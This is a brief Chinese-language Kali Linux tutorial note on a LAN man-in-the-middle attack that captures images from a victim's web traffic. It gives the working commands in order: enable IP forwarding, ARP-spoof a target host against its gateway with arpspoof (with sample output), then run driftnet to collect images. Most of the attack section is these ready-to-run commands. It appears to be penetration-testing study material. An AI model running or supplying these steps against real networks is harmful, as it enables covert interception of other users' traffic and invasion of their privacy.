[关闭]
@websec007 2017-04-22T07:47:15.000000Z 字数 814 阅读 1441

局域网图片截断获取

kali学习

副标题:中间人攻击之图片抓取

1、工具准备

(1)drifnet #本地网卡图片抓取
(2)echo 1 > /proc/sys/net/ipv4/ip_forward #本地数据转发开启
(3)arpspoof #arp 网关欺骗

2、图片阶段抓取实现流程

3、攻击场景演示

3.1 信息收集

(1)目标主机:192.168.31.123
(2)网关地址:192.168.31.1

3.2 开启本地网卡数据转发

  1. root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.2 进行目标主机网关欺骗

  1. root@kali:~# arpspoof -i eth0 -t 192.168.31.123 192.168.31.1
  2. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  3. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  4. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  5. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  6. ....
  7. 不断的向网段中发送arp广播,告诉主机192.168.31.123目标网关地址的mac地址是kali主机的网卡地址,从而达到欺骗目标主机,为实现中间人攻击准备好前奏。

3.4 开启本地网卡图片抓取工具drifnet

  1. root@kali:~# driftnet -i eth0

Markdown

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注